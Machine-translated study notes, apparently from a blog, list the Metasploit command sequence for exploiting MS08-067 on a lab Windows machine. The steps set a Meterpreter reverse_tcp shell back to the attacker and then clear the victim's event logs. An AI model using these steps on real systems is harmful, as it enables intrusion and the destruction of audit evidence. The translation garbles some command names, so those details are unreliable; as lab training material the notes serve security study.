360 Network Security study notes --Web offensive and defensive configuration (Metasploit)

Metasploit path: / usr / share

Metasploit Framework

Examples of operation (ms08-067 exploit penetration drone windos7, operations master kali Linux)

search ms08-067 (look for the corresponding vulnerability)

use exploit / windows / smb / ms08-067_netapi (used in the corresponding path)

set payload windows / meterpreter / reverse_tcp (deployment)

set lhost 192.168.255.175 (host IP)

set rhost 192.168.255.177 (drone IP)

show targets (target drones display)

set target 10

exploit (entering Meterpreter (after penetration attacks Module))

It can then be operated remotely, such as cat, download, search, etc.

clearve (clear log)

 

Translation copy is read queries, please wait ...... retry reading aloud copy copy copy via Google translate (domestic) translation

Guess you like

Origin www.cnblogs.com/z6h6a6zuhya/p/12526762.html